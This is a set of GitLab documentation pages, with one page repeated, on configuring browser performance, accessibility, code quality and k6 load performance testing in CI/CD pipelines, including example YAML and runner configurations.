between the source and target branches, and shows the information in the merge request.
For an example Browser Performance job, see
[Configuring Browser Performance Testing](#configuring-browser-performance-testing).

{{< alert type="note" >}}

If the Browser Performance report has no data to compare, such as when you add the
Browser Performance job in your `.gitlab-ci.yml` for the very first time,
the Browser Performance report widget doesn't display. It must have run at least
once on the target branch (`main`, for example), before it displays in a merge request
targeting that branch. Additionally, the widget only displays if the job ran in the
latest pipeline for the merge request.

{{< /alert >}}

![Browser Performance Widget](img/browser_performance_testing_v13_4.png)

## Configuring Browser Performance Testing

{{< history >}}

- Support for the `SITESPEED_DOCKER_OPTIONS` variable [introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/134024) in GitLab 16.6.

{{< /history >}}

This example shows how to run the
[sitespeed.io container](https://hub.docker.com/r/sitespeedio/sitespeed.io/)
on your code with GitLab CI/CD and [sitespeed.io](https://www.sitespeed.io),
using Docker-in-Docker.

1. First, set up GitLab Runner with a
   [Docker-in-Docker build](../docker/using_docker_build.md#use-docker-in-docker).
1. Configure the default Browser Performance Testing CI/CD job as follows in your
   `.gitlab-ci.yml` file:

   ```yaml
   include:
     template: Verify/Browser-Performance.gitlab-ci.yml

   browser_performance:
     variables:
       URL: https://example.com
   ```

   The previous example:

   - Creates a `browser_performance` job in your CI/CD pipeline and runs sitespeed.io
     against the webpage you defined in `URL` to gather key metrics.
   - Uses a template that doesn't work with Kubernetes clusters. If you are using a
     Kubernetes cluster, use
     [`template: Jobs/Browser-Performance-Testing.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Browser-Performance-Testing.gitlab-ci.yml)
     instead.
The template uses the [GitLab plugin for sitespeed.io](https://gitlab.com/gitlab-org/gl-performance), and it saves the full HTML sitespeed.io report as a [Browser Performance report artifact](../yaml/artifacts_reports.md#artifactsreportsbrowser_performance) that you can later download and analyze. This implementation always takes the latest Browser Performance artifact available. If [GitLab Pages](../../user/project/pages/_index.md) is enabled, you can view the report directly in your browser. You can also customize the jobs with CI/CD variables: - `SITESPEED_IMAGE`: Configure the Docker image to use for the job (default `sitespeedio/sitespeed.io`), but not the image version. - `SITESPEED_VERSION`: Configure the version of the Docker image to use for the job (default `14.1.0`). - `SITESPEED_OPTIONS`: Configure any additional sitespeed.io options as required (default `nil`). Refer to the [sitespeed.io documentation](https://www.sitespeed.io/documentation/sitespeed.io/configuration/) for more details. - `SITESPEED_DOCKER_OPTIONS`: Configure any additional Docker options (default `nil`). Refer to the [Docker options documentation](https://docs.docker.com/reference/cli/docker/container/run/#options) for more details. For example, you can override the number of runs sitespeed.io makes on the given URL, and change the version: ```yaml include: template: Verify/Browser-Performance.gitlab-ci.yml browser_performance: variables: URL: https://www.sitespeed.io/ SITESPEED_VERSION: 13.2.0 SITESPEED_OPTIONS: -n 5 ``` ### Configuring degradation threshold You can configure the sensitivity of degradation alerts to avoid getting alerts for minor drops in metrics. This is done by setting the `DEGRADATION_THRESHOLD` CI/CD variable. 
In the following example, the alert only shows up if the `Total Score` metric degrades by 5 points or more: ```yaml include: template: Verify/Browser-Performance.gitlab-ci.yml browser_performance: variables: URL: https://example.com DEGRADATION_THRESHOLD: 5 ``` The `Total Score` metric is based on sitespeed.io's [coach performance score](https://www.sitespeed.io/documentation/sitespeed.io/metrics/#performance-score). There is more information in [the coach documentation](https://www.sitespeed.io/documentation/coach/how-to/#what-do-the-coach-do). ### Performance testing on review apps The previous CI YAML configuration is great for testing against static environments, and it can be extended for dynamic environments, but a few extra steps are required: 1. The `browser_performance` job should run after the dynamic environment has started. 1. In the `review` job: 1. Generate a URL list file with the dynamic URL. 1. Save the file as an artifact, for example with `echo $CI_ENVIRONMENT_URL > environment_url.txt` in your job's `script`. 1. Pass the list as the URL environment variable (which can be a URL or a file containing URLs) to the `browser_performance` job. 1. You can now run the sitespeed.io container against the desired hostname and paths. Your `.gitlab-ci.yml` file would look like: ```yaml stages: - deploy - performance include: template: Verify/Browser-Performance.gitlab-ci.yml review: stage: deploy environment: name: review/$CI_COMMIT_REF_SLUG url: http://$CI_COMMIT_REF_SLUG.$APPS_DOMAIN script: - run_deploy_script - echo $CI_ENVIRONMENT_URL > environment_url.txt artifacts: paths: - environment_url.txt rules: - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH when: never - if: $CI_COMMIT_BRANCH browser_performance: dependencies: - review variables: URL: environment_url.txt ```
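The threshold comparison described above can be sketched as follows. This is a hypothetical illustration of how `DEGRADATION_THRESHOLD` gates the alert, not the template's actual report-processing code:

```python
def should_alert(target_branch_score, source_branch_score, degradation_threshold=0):
    """Alert only when the Total Score drops by at least the threshold.

    Hypothetical helper for illustration: a positive degradation means the
    source branch scored lower than the target branch.
    """
    degradation = target_branch_score - source_branch_score
    return degradation > 0 and degradation >= degradation_threshold

# With DEGRADATION_THRESHOLD: 5, a 4-point drop stays quiet:
print(should_alert(90, 86, degradation_threshold=5))  # False
print(should_alert(90, 84, degradation_threshold=5))  # True
```

A drop of exactly 5 points still alerts, matching "degrades by 5 points or more".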
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Browser Performance Testing breadcrumbs: - doc - ci - testing --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If your application offers a web interface and you're using [GitLab CI/CD](../_index.md), you can quickly determine the rendering performance impact of pending code changes in the browser. {{< alert type="note" >}} You can automate this feature in your applications by using [Auto DevOps](../../topics/autodevops/_index.md). {{< /alert >}} GitLab uses [Sitespeed.io](https://www.sitespeed.io), a free and open source tool, for measuring the rendering performance of web sites. The [Sitespeed plugin](https://gitlab.com/gitlab-org/gl-performance) that GitLab built outputs the performance score for each page analyzed in a file called `browser-performance.json` this data can be shown on merge requests. ## Use cases Consider the following workflow: 1. A member of the marketing team is attempting to track engagement by adding a new tool. 1. With browser performance metrics, they see how their changes are impacting the usability of the page for end users. 1. The metrics show that after their changes, the performance score of the page has gone down. 1. When looking at the detailed report, they see the new JavaScript library was included in `<head>`, which affects loading page speed. 1. They ask for help from a front end developer, who sets the library to load asynchronously. 1. The frontend developer approves the merge request, and authorizes its deployment to production. 
## How browser performance testing works

First, define a job in your `.gitlab-ci.yml` file that generates the [Browser Performance report artifact](../yaml/artifacts_reports.md#artifactsreportsbrowser_performance). GitLab then checks this report, compares key performance metrics for each page between the source and target branches, and shows the information in the merge request.

For an example Browser Performance job, see [Configuring Browser Performance Testing](#configuring-browser-performance-testing).

{{< alert type="note" >}}

If the Browser Performance report has no data to compare, such as when you add the Browser Performance job in your `.gitlab-ci.yml` for the very first time, the Browser Performance report widget doesn't display. It must have run at least once on the target branch (`main`, for example), before it displays in a merge request targeting that branch. Additionally, the widget only displays if the job ran in the latest pipeline for the merge request.

{{< /alert >}}

![Browser Performance Widget](img/browser_performance_testing_v13_4.png)

## Configuring Browser Performance Testing

{{< history >}}

- Support for the `SITESPEED_DOCKER_OPTIONS` variable [introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/134024) in GitLab 16.6.

{{< /history >}}

This example shows how to run the [sitespeed.io container](https://hub.docker.com/r/sitespeedio/sitespeed.io/) on your code by using GitLab CI/CD and [sitespeed.io](https://www.sitespeed.io) with Docker-in-Docker.

1. First, set up GitLab Runner with a [Docker-in-Docker build](../docker/using_docker_build.md#use-docker-in-docker).
1. Configure the default Browser Performance Testing CI/CD job as follows in your `.gitlab-ci.yml` file:

   ```yaml
   include:
     template: Verify/Browser-Performance.gitlab-ci.yml

   browser_performance:
     variables:
       URL: https://example.com
   ```

The previous example:

- Creates a `browser_performance` job in your CI/CD pipeline and runs sitespeed.io against the webpage you defined in `URL` to gather key metrics.
- Uses a template that doesn't work with Kubernetes clusters. If you are using a Kubernetes cluster, use [`template: Jobs/Browser-Performance-Testing.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Browser-Performance-Testing.gitlab-ci.yml) instead.

The template uses the [GitLab plugin for sitespeed.io](https://gitlab.com/gitlab-org/gl-performance), and it saves the full HTML sitespeed.io report as a [Browser Performance report artifact](../yaml/artifacts_reports.md#artifactsreportsbrowser_performance) that you can later download and analyze. This implementation always takes the latest Browser Performance artifact available. If [GitLab Pages](../../user/project/pages/_index.md) is enabled, you can view the report directly in your browser.

You can also customize the jobs with CI/CD variables:

- `SITESPEED_IMAGE`: Configure the Docker image to use for the job (default `sitespeedio/sitespeed.io`), but not the image version.
- `SITESPEED_VERSION`: Configure the version of the Docker image to use for the job (default `14.1.0`).
- `SITESPEED_OPTIONS`: Configure any additional sitespeed.io options as required (default `nil`). Refer to the [sitespeed.io documentation](https://www.sitespeed.io/documentation/sitespeed.io/configuration/) for more details.
- `SITESPEED_DOCKER_OPTIONS`: Configure any additional Docker options (default `nil`). Refer to the [Docker options documentation](https://docs.docker.com/reference/cli/docker/container/run/#options) for more details.
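As an illustration of `SITESPEED_DOCKER_OPTIONS`, the following passes an extra flag to the container runtime. The `--shm-size=1g` value is only an example of a Docker option you might need, not something the template requires:

```yaml
include:
  template: Verify/Browser-Performance.gitlab-ci.yml

browser_performance:
  variables:
    URL: https://example.com
    # Example Docker option: enlarge shared memory for the browser inside the container
    SITESPEED_DOCKER_OPTIONS: '--shm-size=1g'
```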
For example, you can override the number of runs sitespeed.io makes on the given URL, and change the version: ```yaml include: template: Verify/Browser-Performance.gitlab-ci.yml browser_performance: variables: URL: https://www.sitespeed.io/ SITESPEED_VERSION: 13.2.0 SITESPEED_OPTIONS: -n 5 ``` ### Configuring degradation threshold You can configure the sensitivity of degradation alerts to avoid getting alerts for minor drops in metrics. This is done by setting the `DEGRADATION_THRESHOLD` CI/CD variable. In the following example, the alert only shows up if the `Total Score` metric degrades by 5 points or more: ```yaml include: template: Verify/Browser-Performance.gitlab-ci.yml browser_performance: variables: URL: https://example.com DEGRADATION_THRESHOLD: 5 ``` The `Total Score` metric is based on sitespeed.io's [coach performance score](https://www.sitespeed.io/documentation/sitespeed.io/metrics/#performance-score). There is more information in [the coach documentation](https://www.sitespeed.io/documentation/coach/how-to/#what-do-the-coach-do). ### Performance testing on review apps The previous CI YAML configuration is great for testing against static environments, and it can be extended for dynamic environments, but a few extra steps are required: 1. The `browser_performance` job should run after the dynamic environment has started. 1. In the `review` job: 1. Generate a URL list file with the dynamic URL. 1. Save the file as an artifact, for example with `echo $CI_ENVIRONMENT_URL > environment_url.txt` in your job's `script`. 1. Pass the list as the URL environment variable (which can be a URL or a file containing URLs) to the `browser_performance` job. 1. You can now run the sitespeed.io container against the desired hostname and paths. 
Your `.gitlab-ci.yml` file would look like: ```yaml stages: - deploy - performance include: template: Verify/Browser-Performance.gitlab-ci.yml review: stage: deploy environment: name: review/$CI_COMMIT_REF_SLUG url: http://$CI_COMMIT_REF_SLUG.$APPS_DOMAIN script: - run_deploy_script - echo $CI_ENVIRONMENT_URL > environment_url.txt artifacts: paths: - environment_url.txt rules: - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH when: never - if: $CI_COMMIT_BRANCH browser_performance: dependencies: - review variables: URL: environment_url.txt ```
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Accessibility testing
breadcrumbs:
- doc
- ci
- testing
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

If your application offers a web interface, you can use [GitLab CI/CD](../_index.md) to determine the accessibility impact of pending code changes.

[Pa11y](https://pa11y.org/) is a free and open source tool for measuring the accessibility of web sites. GitLab integrates Pa11y into a [CI/CD job template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Verify/Accessibility.gitlab-ci.yml). The `a11y` job analyzes a defined set of web pages and reports accessibility violations, warnings, and notices in a file named `accessibility`.

Pa11y uses [WCAG 2.1 rules](https://www.w3.org/TR/WCAG21/#new-features-in-wcag-2-1).

## Accessibility merge request widget

GitLab displays an **Accessibility Report** in the merge request widget area:

![Accessibility merge request widget](img/accessibility_mr_widget_v13_0.png)

## Configure accessibility testing

You can run Pa11y with GitLab CI/CD using the [GitLab Accessibility Docker image](https://gitlab.com/gitlab-org/ci-cd/accessibility).

To define the `a11y` job:

1. [Include](../yaml/_index.md#includetemplate) the [`Accessibility.gitlab-ci.yml` template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Verify/Accessibility.gitlab-ci.yml) from your GitLab installation.
1. Add the following configuration to your `.gitlab-ci.yml` file.

   ```yaml
   stages:
     - accessibility

   variables:
     a11y_urls: "https://about.gitlab.com https://gitlab.com/users/sign_in"

   include:
     - template: "Verify/Accessibility.gitlab-ci.yml"
   ```

1. Customize the `a11y_urls` variable to list the URLs of the web pages to test with Pa11y.

The `a11y` job in your CI/CD pipeline generates these files:

- One HTML report per URL listed in the `a11y_urls` variable.
- One file containing the collected report data. This file is named `gl-accessibility.json`.

You can [view job artifacts in your browser](../jobs/job_artifacts.md#download-job-artifacts).

{{< alert type="note" >}}

The job definition provided by the template does not support Kubernetes.

{{< /alert >}}

You cannot pass configurations into Pa11y via CI configuration. To change the configuration, edit a copy of the template in your CI file.
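Job-level settings can still be adjusted without copying the template, by overriding the templated `a11y` job in your `.gitlab-ci.yml`. This sketch uses standard GitLab CI job overriding; the tag name is a placeholder for one of your runners:

```yaml
include:
  - template: "Verify/Accessibility.gitlab-ci.yml"

a11y:
  tags:
    - docker-runner    # placeholder: route the job to a suitable runner
  allow_failure: true  # report violations without blocking the pipeline
```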
---
stage: Application Security Testing
group: Static Analysis
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Troubleshooting Code Quality
breadcrumbs:
- doc
- ci
- testing
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

When working with Code Quality, you might encounter the following issues.

## The code cannot be found and the pipeline always runs with the default configuration

You are probably using a private runner with the Docker-in-Docker socket-binding configuration. You should configure Code Quality checks to run on your worker as documented in [Use private runners](code_quality_codeclimate_scanning.md#use-private-runners).

## Changing the default configuration has no effect

A common issue is that the terms `Code Quality` (GitLab specific) and `Code Climate` (the engine used by GitLab) are very similar. You must add a **`.codeclimate.yml`** file to change the default configuration, **not** a `.codequality.yml` file. If you use the wrong filename, the [default `.codeclimate.yml`](https://gitlab.com/gitlab-org/ci-cd/codequality/-/blob/master/codeclimate_defaults/.codeclimate.yml.template) is still used.

## No Code Quality report is displayed in a merge request

Code Quality reports from the source or target branch may be missing for comparison on the merge request, so no information can be displayed.

A missing report on the source branch can be due to:

- Use of the [`REPORT_STDOUT` environment variable](https://gitlab.com/gitlab-org/ci-cd/codequality#environment-variables). With this variable set, no report file is generated, so nothing displays in the merge request.

A missing report on the target branch can be due to:

- A newly added Code Quality job in your `.gitlab-ci.yml`.
- Your pipeline is not set to run the Code Quality job on your target branch.
- Commits are made to the default branch that do not run the Code Quality job.
- The [`artifacts:expire_in`](../yaml/_index.md#artifactsexpire_in) CI/CD setting can cause the Code Quality artifacts to expire faster than desired.

Verify the presence of a report on the base commit by obtaining the `base_sha` with the [merge request API](../../api/merge_requests.md#get-single-mr), then use the [pipelines API with the `sha` attribute](../../api/pipelines.md#list-project-pipelines) to check whether pipelines ran.

## No Code Quality symbol in the changes view

If no symbol is displayed in the [changes view](code_quality.md#merge-request-changes-view), ensure that the `location.path` in the code quality report:

- Is using a relative path to the file containing the code quality violation.
- Is not prefixed with `./`. For example, the `path` should be `somedir/file1.rb` instead of `./somedir/file1.rb`.

## Only a single Code Quality report is displayed, but more are defined

Code Quality automatically [combines multiple reports](code_quality.md#scan-code-for-quality-violations).

In GitLab 15.6 and earlier, Code Quality used only the artifact from the latest created job (with the largest job ID). Code Quality artifacts from earlier jobs were ignored.

## RuboCop errors

When using Code Quality jobs on a Ruby project, you can encounter problems running RuboCop. For example, the following error can appear when using either a very recent or very old version of Ruby:

```plaintext
/usr/local/bundle/gems/rubocop-0.52.1/lib/rubocop/config.rb:510:in `check_target_ruby':
Unknown Ruby version 2.7 found in `.ruby-version`. (RuboCop::ValidationError)
Supported versions: 2.1, 2.2, 2.3, 2.4, 2.5
```

This occurs when the default version of RuboCop used by the check engine does not support the Ruby version in use.
To use a custom version of RuboCop that [supports the version of Ruby used by the project](https://docs.rubocop.org/rubocop/compatibility.html#support-matrix), you can [override the configuration through a `.codeclimate.yml` file](https://docs.codeclimate.com/docs/rubocop#using-rubocops-newer-versions) created in the project repository.

For example, to specify using RuboCop release **0.67**:

```yaml
version: "2"
plugins:
  rubocop:
    enabled: true
    channel: rubocop-0-67
```

## No Code Quality appears on merge requests when using custom tool

If your merge requests do not show any Code Quality changes when using a custom tool, ensure that *all* line properties in the JSON are `integer`.

## Error: `Could not analyze code quality`

You might get the error:

```shell
error: (CC::CLI::Analyze::EngineFailure) engine pmd ran for 900 seconds and was killed
Could not analyze code quality for the repository at /code
```

If you enabled any of the Code Climate plugins, and the Code Quality CI/CD job fails with this error message, it's likely the job takes longer than the default timeout of 900 seconds. To work around this problem, set `TIMEOUT_SECONDS` to a higher value in your `.gitlab-ci.yml` file.

For example:

```yaml
code_quality:
  variables:
    TIMEOUT_SECONDS: 3600
```

## Using Code Quality with a Kubernetes or OpenShift runner

CodeClimate-based scanning has special requirements. You may need to [Configure Kubernetes or OpenShift runners for CodeClimate-based scanning](code_quality_codeclimate_scanning.md#configure-kubernetes-or-openshift-runners) before scans work properly.
## Error: `x509: certificate signed by unknown authority`

If you set the `CODE_QUALITY_IMAGE` to an image that is hosted in a Docker registry which uses a TLS certificate that is not trusted, such as a self-signed certificate, you might see the following error:

```shell
$ docker pull --quiet "$CODE_QUALITY_IMAGE"
Error response from daemon: Get https://gitlab.example.com/v2/: x509: certificate signed by unknown authority
```

To fix this, configure the Docker daemon to [trust certificates](https://distribution.github.io/distribution/about/insecure/#use-self-signed-certificates) by putting the certificate inside of the `/etc/docker/certs.d` directory.

This Docker daemon is exposed to the subsequent Code Quality Docker container in the [GitLab Code Quality template](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.8.3-ee/lib/gitlab/ci/templates/Jobs/Code-Quality.gitlab-ci.yml#L41) and should be exposed to any other containers to which you want your certificate configuration to apply.

### Docker

If you have access to GitLab Runner configuration, add the directory as a [volume mount](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section). Replace `gitlab.example.com` with the actual domain of the registry.

Example:

```toml
[[runners]]
  ...
  executor = "docker"
  [runners.docker]
    ...
    privileged = true
    volumes = ["/cache", "/etc/gitlab-runner/certs/gitlab.example.com.crt:/etc/docker/certs.d/gitlab.example.com/ca.crt:ro"]
```

### Kubernetes

If you have access to GitLab Runner configuration and the Kubernetes cluster, you can [mount a ConfigMap](https://docs.gitlab.com/runner/executors/kubernetes/#configmap-volume). Replace `gitlab.example.com` with the actual domain of the registry.

1. Create a ConfigMap with the certificate:

   ```shell
   kubectl create configmap registry-crt --namespace gitlab-runner --from-file /etc/gitlab-runner/certs/gitlab.example.com.crt
   ```

1. Update GitLab Runner `config.toml` to specify the ConfigMap:

   ```toml
   [[runners]]
     ...
     executor = "kubernetes"
     [runners.kubernetes]
       image = "alpine:3.12"
       privileged = true
       [[runners.kubernetes.volumes.config_map]]
         name = "registry-crt"
         mount_path = "/etc/docker/certs.d/gitlab.example.com/ca.crt"
         sub_path = "gitlab.example.com.crt"
   ```

## Failed to load Code Quality report

The Code Quality report can fail to load when there are issues parsing data from the artifact file. To gain insight into the errors, you can execute a GraphQL query using the following steps:

1. Go to the pipeline details page.
1. Append `.json` to the URL.
1. Copy the `iid` of the pipeline.
1. Go to the [interactive GraphQL explorer](../../api/graphql/_index.md#interactive-graphql-explorer).
1. Run the following query:

   ```graphql
   {
     project(fullPath: "<fullpath-to-your-project>") {
       pipeline(iid: "<iid>") {
         codeQualityReports {
           count
           nodes {
             line
             description
             path
             fingerprint
             severity
           }
           pageInfo {
             hasNextPage
             hasPreviousPage
             startCursor
             endCursor
           }
         }
       }
     }
   }
   ```

## No report artifact is created

With certain Runner configurations, the Code Quality scanning job may not have access to your source code. If this happens, the `gl-code-quality-report.json` artifact won't be created. To resolve this issue, either:

- Use the [documented Runner configuration for Docker-in-Docker](../docker/using_docker_build.md#use-docker-in-docker), which uses privileged mode instead of Docker socket binding.
- Apply the [community workaround in issue 32027](https://gitlab.com/gitlab-org/gitlab/-/issues/32027#note_1318822628) if you wish to continue using Docker socket binding.

For more details, see [Change Runner configuration](code_quality_codeclimate_scanning.md#change-runner-configuration).
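For reference, the documented Docker-in-Docker approach corresponds to a runner registered in privileged mode instead of binding the host's Docker socket. A minimal sketch of the relevant `config.toml` section follows; the image tag and volume list are illustrative:

```toml
[[runners]]
  executor = "docker"
  [runners.docker]
    image = "docker:24.0"
    # Privileged mode enables Docker-in-Docker. There is no /var/run/docker.sock
    # bind mount here - that would be the socket-binding configuration.
    privileged = true
    volumes = ["/certs/client", "/cache"]
```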
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Load Performance Testing
breadcrumbs:
- doc
- ci
- testing
---
{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

With Load Performance Testing, you can test the impact of any pending code changes to your application's backend in [GitLab CI/CD](../_index.md).

GitLab uses [k6](https://k6.io/), a free and open source tool, for measuring the system performance of applications under load.

Unlike [Browser Performance Testing](browser_performance_testing.md), which measures how web sites perform in client browsers, Load Performance Testing performs various types of [load tests](https://k6.io/docs/#use-cases) against application endpoints such as APIs and web controllers. This can be used to test how the backend or the server performs at scale.

For example, you can use Load Performance Testing to perform many concurrent GET calls to a popular API endpoint in your application to see how it performs.

## How Load Performance Testing works

First, define a job in your `.gitlab-ci.yml` file that generates the [Load Performance report artifact](../yaml/artifacts_reports.md#artifactsreportsload_performance). GitLab checks this report, compares key load performance metrics between the source and target branches, and then shows the information in a merge request widget:

![Load Performance Widget](img/load_performance_testing_v13_2.png)

Next, you need to configure the test environment and write the k6 test.

The key performance metrics that the merge request widget shows after the test completes are:

- Checks: The percentage pass rate of the [checks](https://k6.io/docs/using-k6/checks) configured in the k6 test.
- TTFB P90: The 90th percentile of how long it took to start receiving responses, also known as the [Time to First Byte](https://en.wikipedia.org/wiki/Time_to_first_byte) (TTFB).
- TTFB P95: The 95th percentile for TTFB.
- RPS: The average requests per second (RPS) rate the test was able to achieve.
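The widget is populated from a report artifact produced by the job. When not using the template described later, a hand-rolled job along these lines could produce the required artifact; the file names and image tag are illustrative, and `--summary-export` is the k6 flag that writes the summary JSON:

```yaml
load_performance:
  stage: test
  image:
    name: loadimpact/k6:latest
    entrypoint: ['']
  script:
    # Run the test and save the summary metrics GitLab reads for the widget
    - k6 run --summary-export=load-performance.json k6-test.js
  artifacts:
    reports:
      load_performance: load-performance.json
```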
{{< alert type="note" >}}

If the Load Performance report has no data to compare, such as when you add the Load Performance job in your `.gitlab-ci.yml` for the very first time, the Load Performance report widget doesn't display. It must have run at least once on the target branch (`main`, for example), before it displays in a merge request targeting that branch.

{{< /alert >}}

## Configure the Load Performance Testing job

Configuring your Load Performance Testing job can be broken down into several distinct parts:

- Determine the test parameters, such as the throughput to test with.
- Set up the target test environment for load performance testing.
- Design and write the k6 test.

### Determine the test parameters

The first thing you need to do is determine the [type of load test](https://grafana.com/load-testing/types-of-load-testing/) you want to run, and how you want it to run (for example, the number of users, throughput, and so on).

Refer to the [k6 docs](https://k6.io/docs/), especially the [k6 testing guides](https://k6.io/docs/testing-guides) for guidance.

### Test environment setup

A large part of the effort around load performance testing is to prepare the target test environment for high loads. You should ensure it's able to handle the [throughput](https://k6.io/blog/monthly-visits-concurrent-users) it is tested with.

It's also typically required to have representative test data in the target environment for the load performance test to use.

We strongly recommend [not running these tests against a production environment](https://k6.io/our-beliefs#load-test-in-a-pre-production-environment).

### Write the load performance test

After the environment is prepared, you can write the k6 test itself. k6 is a flexible tool and can be used to run [many kinds of performance tests](https://grafana.com/load-testing/types-of-load-testing/). Refer to the [k6 documentation](https://k6.io/docs/) for detailed information on how to write tests.
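As a starting point, a minimal k6 test that exercises one endpoint and records a check might look like the following. The URL, virtual-user count, and duration are placeholders to adapt to your own test parameters:

```javascript
import http from 'k6/http';
import { check } from 'k6';

export const options = {
  vus: 10,          // 10 concurrent virtual users
  duration: '30s',  // sustain the load for 30 seconds
};

export default function () {
  // Placeholder endpoint: replace with the API under test
  const res = http.get('https://example.com/api/health');
  check(res, {
    'status is 200': (r) => r.status === 200,
  });
}
```

The pass rate of the `check` here is what feeds the Checks metric shown in the merge request widget.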
### Configure the test in GitLab CI/CD When your k6 test is ready, the next step is to configure the load performance testing job in GitLab CI/CD. The easiest way to do this is to use the [`Verify/Load-Performance-Testing.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Verify/Load-Performance-Testing.gitlab-ci.yml) template that is included with GitLab. {{< alert type="note" >}} For large scale k6 tests you need to ensure the GitLab Runner instance performing the actual test is able to handle running the test. Refer to [k6's guidance](https://k6.io/docs/testing-guides/running-large-tests#hardware-considerations) for spec details. The [default shared GitLab.com runners](../runners/hosted_runners/linux.md) likely have insufficient specs to handle most large k6 tests. {{< /alert >}} This template runs the [k6 Docker container](https://hub.docker.com/r/loadimpact/k6/) in the job and provides several ways to customize the job. An example configuration workflow: 1. Set up GitLab Runner to run Docker containers, like the [Docker-in-Docker workflow](../docker/using_docker_build.md#use-docker-in-docker). 1. Configure the default Load Performance Testing CI/CD job in your `.gitlab-ci.yml` file. You need to include the template and configure it with CI/CD variables: ```yaml include: template: Verify/Load-Performance-Testing.gitlab-ci.yml load_performance: variables: K6_TEST_FILE: <PATH TO K6 TEST FILE IN PROJECT> ``` The previous example creates a `load_performance` job in your CI/CD pipeline that runs the k6 test. {{< alert type="note" >}} For Kubernetes setups a different template should be used: [`Jobs/Load-Performance-Testing.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Load-Performance-Testing.gitlab-ci.yml). 
{{< /alert >}} k6 has [various options](https://k6.io/docs/using-k6/k6-options/reference/) to configure how it runs the tests, such as what throughput (RPS) to run with, how long the test should run, and so on. Almost all options can be configured in the test itself, but you can also pass command-line options via the `K6_OPTIONS` variable. For example, you can override the duration of the test with a CLI option: ```yaml include: template: Verify/Load-Performance-Testing.gitlab-ci.yml load_performance: variables: K6_TEST_FILE: <PATH TO K6 TEST FILE IN PROJECT> K6_OPTIONS: '--duration 30s' ``` GitLab only displays the key performance metrics in the MR widget if k6's results are saved via [summary export](https://k6.io/docs/results-output/real-time/json/#summary-export) as a [Load Performance report artifact](../yaml/artifacts_reports.md#artifactsreportsload_performance). The latest Load Performance artifact available is always used, using the summary values from the test. If [GitLab Pages](../../user/project/pages/_index.md) is enabled, you can view the report directly in your browser. ### Load Performance testing in review apps The previous CI/CD YAML configuration example works for testing against static environments, but it can be extended to work with [review apps](../review_apps/_index.md) or [dynamic environments](../environments/_index.md) with a few extra steps. The best approach is to capture the dynamic URL in a [`.env` file](https://docs.docker.com/compose/environment-variables/env-file/) as a job artifact to be shared, then use a custom CI/CD variable we've provided named `K6_DOCKER_OPTIONS` to configure the k6 Docker container to use the file. With this, k6 can then use any environment variables from the `.env` file in scripts using standard JavaScript, such as: ``http.get(`${__ENV.ENVIRONMENT_URL}`)``. For example: 1. In the `review` job: 1.
Capture the dynamic URL and save it into a `.env` file, for example, `echo "ENVIRONMENT_URL=$CI_ENVIRONMENT_URL" >> review.env`. 1. Set the `.env` file to be a [job artifact](../jobs/job_artifacts.md). 1. In the `load_performance` job: 1. Set it to depend on the review job, so it inherits the environment file. 1. Set the `K6_DOCKER_OPTIONS` variable with the [Docker CLI option for environment files](https://docs.docker.com/reference/cli/docker/container/run/#env), for example `--env-file review.env`. 1. Configure the k6 test script to use the environment variable in its steps. Your `.gitlab-ci.yml` file might be similar to: ```yaml stages: - deploy - performance include: template: Verify/Load-Performance-Testing.gitlab-ci.yml review: stage: deploy environment: name: review/$CI_COMMIT_REF_SLUG url: http://$CI_ENVIRONMENT_SLUG.example.com script: - run_deploy_script - echo "ENVIRONMENT_URL=$CI_ENVIRONMENT_URL" >> review.env artifacts: paths: - review.env rules: - if: $CI_COMMIT_BRANCH # Modify to match your pipeline rules, or use `only/except` if needed. load_performance: dependencies: - review variables: K6_DOCKER_OPTIONS: '--env-file review.env' rules: - if: $CI_COMMIT_BRANCH # Modify to match your pipeline rules, or use `only/except` if needed. ```
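The `.env` hand-off above can be sanity-checked locally. Docker's `--env-file` injects each `KEY=value` line into the container's environment, which is roughly what sourcing the file with `allexport` does in a shell (the URL below is a stand-in for whatever the review job writes):

```shell
# Simulate what the review job writes as a job artifact.
echo "ENVIRONMENT_URL=https://review-abc123.example.com" > review.env

# `docker run --env-file review.env ...` injects these variables into the
# k6 container; sourcing the file with allexport is the shell equivalent.
set -a
. ./review.env
set +a

# Inside the test script, k6 reads this as __ENV.ENVIRONMENT_URL.
echo "k6 will target: $ENVIRONMENT_URL"
```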
